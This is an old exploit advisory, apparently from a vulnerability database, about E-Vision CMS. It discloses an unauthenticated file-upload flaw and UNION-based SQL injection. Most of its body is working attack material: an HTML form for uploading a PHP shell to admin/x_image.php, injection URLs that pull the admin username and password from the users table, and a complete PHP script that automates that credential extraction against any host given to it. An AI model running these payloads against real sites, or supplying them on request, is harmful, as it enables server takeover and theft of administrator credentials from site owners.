E-Vision CMS Multible Remote injections

2006.10.01
Credit: HACKERS PAL
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

Hello,, E-Vision CMS Multible Remote injections (SQL and File upload) Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] upload any file admin/x_image.php this file is used to upload files and it does not check the permission This file can be used to upload any file to the dir /imagebank replace http://localhost/evision_cms/ to the website dir and choose any file to upload it will be uploaded <form enctype="multipart/form-data" action="http://localhost/evision_cms/admin/x_image.php" method="POST"> <input type=hidden name="insert" value="insert"> <input type=hidden name="s_rc" value="file://"> Upload PHP Shell : <input type="file" name="file_upload"> <br> <input type=submit value="upload"> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sql Injection Password: admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null% 20from%20users%20where%20idusers=1/* User Name: admin/all_users.php?from=-1%20union%20select%20null,null,null,username,n ull%20from%20users%20where%20idusers=1/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Exploits :- For PHP shell uploading:- <form enctype="multipart/form-data" action="http://localhost/evision_cms/admin/x_image.php" method="POST"> <input type=hidden name="insert" value="insert"> <input type=hidden name="s_rc" value="file://"> Upload PHP Shell : <input type="file" name="file_upload"> <br> <input type=submit value="upload"> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - For Sql injection:- #!/usr/bin/php -q -d short_open_tag=on <? /* /* e-Vision CMS Remote sql injection exploit /* By : HACKERS PAL /* WwW.SoQoR.NeT */ print_r(' /**********************************************/ /* e-Vision CMS Remote sql injection exploit */ /* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */ /* site: http://www.soqor.net */'); if ($argc<2) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host /* Example: */ /* php '.$argv[0].' http://localhost/evision /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); $url=$argv[1]; $exploit="/admin/all_users.php?from=-1%20union%20select%20null,null,null ,username,null%20from%20users%20where%20idusers=1/*"; $exploit2="/admin/all_users.php?from=-1%20union%20select%20null,null,nul l,pass,null%20from%20users%20where%20idusers=1/*"; Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } function get($var) { if(strlen($var[1])>0) { Echo trim($var[1]); } } $page = get_page($url.$exploit); $page2 = get_page($url.$exploit2); if(preg_match('/\<td bgcolor=\"#C2D4E8\">(.+?)<\/td\>/is',$page)) { Echo "\n[+] User Name : "; preg_replace_callback('/\<td bgcolor=\"#C2D4E8\">(.+?)<\/td\>/is','get',$page); Echo "\n[+] Pass Word : "; preg_replace_callback('/\<td bgcolor=\"#C2D4E8\">(.+?)<\/td\>/is','get',$page2); Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); ?> #WwW.SoQoR.NeT


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top